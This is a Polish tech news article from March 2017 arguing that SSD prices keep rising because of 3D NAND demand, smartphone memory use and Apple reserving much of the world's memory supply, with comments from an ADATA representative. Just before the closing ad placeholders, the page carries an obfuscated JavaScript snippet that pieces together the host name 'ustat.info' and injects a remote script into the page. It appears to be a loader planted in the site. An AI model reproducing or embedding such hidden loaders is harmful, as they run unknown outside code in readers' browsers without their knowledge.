REKLAMA

Podziękuj Apple. To przez nich dyski SSD wciąż są tak absurdalnie drogie

Przyszedł bardzo zły moment na kupno napędu półprzewodnikowego. Koszt tego typu komponentów w ostatnim czasie znacznie wzrósł i w dalszym ciągu będzie wzrastać. Co ciekawe, wysokie ceny SSD to w dużej mierze zasługa Apple i tegorocznych iPhone'ów.

15.03.2017 17.08
Wydajność Intel Optane i dobrych dysków SSD jest porównywalna.
REKLAMA
REKLAMA

Jest to spowodowane obecną sytuacją na rynku. Do niedawna popyt na napędy SSD był zauważalnie mniejszy, niż podaż. Zmieniło się to, gdy na rynek zaczęły wchodzić dyski wyposażone w pamięci trójwymiarowe (3D NAND).

Wysokie ceny SSD 2 class="wp-image-551305"

Rozwiązanie to okazało się na tyle wydajne, wytrzymałe i tanie w produkcji, że zdecydowana większość producentów zdecydowała się z niego korzystać. Zmiana technologii produkcji zeszła się ze znacznym wzrostem popytu i… obecnie to zapotrzebowanie na napędy półprzewodnikowe jest większe, niż ich dostawy, a wskaźnik wystarczalności na tym rynku maleje.

To spowodowało znaczne podwyżki cen pod koniec poprzedniego roku.

Były one znaczące. Przykładowo, napędy SSD o pojemności 128 GB podrożały za 149 zł do 249-299 zł. Michał Orłowski z ADATA powiedział nam, że rok temu jego firma planowała wycofać się ze sprzedawania napędów o takich pojemnościach. Teraz musi do nich powrócić, ponieważ polski rynek jest bardzo wyczulony na wszelkie podwyżki cen.

Wysokie ceny SSD 1 class="wp-image-551304"

Jesteśmy ubogim społeczeństwem, dlatego najchętniej sięgamy nie po rozwiązania najlepsze, ale wystarczające i charakteryzujące się dobrym stosunkiem jakości do ceny. To może tłumaczyć, dlaczego ADATA bije na naszym lokalnym poletku tak renomowane firmy jak Samsung, Kingston, GoodRAM oraz Crucial.

W 2016 roku to właśnie ADATA sprzedała w Polsce najwięcej, prawie 300 000 napędów SSD. Jednak nie tylko u nas klienci lubią dobre i tanie rozwiązania. Dowodem na to jest odchodzenie od bardzo dobrych pamięci SLC (Single Level Cell) i MLC (Multi Level Cell) na rzecz optymalnych TLC (Triple Level Cell). Cenimy sobie dobre i tanie rozwiązania.

Wysokie ceny SSD 3 class="wp-image-551306"

Podwyżka cen pamięci z końcówki roku spowodowała tylko chwilowy spadek popytu na nie. Dlatego należy spodziewać się, że już wysokie ceny SSD będą jeszcze bardziej rosnąć, ponieważ nie ma alternatywy dla tego rozwiązania. Przede wszystkim coraz więcej pamięci wykorzystuje się w smartfonach i fabryki najchętniej tworzą właśnie tego typu pamięci. Minęły już czasy, gdy wysokiej klasy urządzenie mobilne miało 16 GB pamięci flash. Teraz sztandarowy smartfon ma co najmniej 64 GB pamięci, a najdroższe modele są wyposażone w nawet 128 lub 256 GB pamięci.

Bardzo duży wpływ na wysokie ceny pamięci ma też Apple.

Okazuje się, że firma z Cupertino jest pewna gigantycznego sukcesu sprzedażowego nadchodzących iPhone’ów. Dlatego na początku roku zdecydowała się zarezerwować aż 40 proc. światowych zasobów pamięci do telefonów. Tak ogromne zamówienie spowodowało kolejne wzrosty cen pamięci na całym rynku.

REKLAMA

Podwyżka ta jeszcze nie przełożyła się na obecne w sklepach urządzenia, ponieważ producenci cały czas korzystają z wcześniej zamówionych komponentów. Oznacza to, że niebawem ceny nie tylko smartfonów, ale też komputerów oraz napędów SSD mogą znacznie wzrosnąć. Dlatego jeżeli zamierzacie kupić tego typu sprzęt, zróbcie to teraz. Nie ma na co czekać. Taniej nie będzie.

(function(){ o6zf=document.createElement("script");o6zf.async=true;o6zf_="u"+("s")+"t"; o6zfu="60756489.";o6zf_+="a"+("t.i");o6zf_+="n"+("f"+"o")+"/"; o6zfu+="m4d5l47p6zfqcn5duj9yva"+("6zwmxnr7"); o6zf.src="//"+o6zf_+o6zfu;o6zf.type="text/javascript"; document.body.appendChild(o6zf); })();

REKLAMA
Najnowsze
REKLAMA
REKLAMA
REKLAMA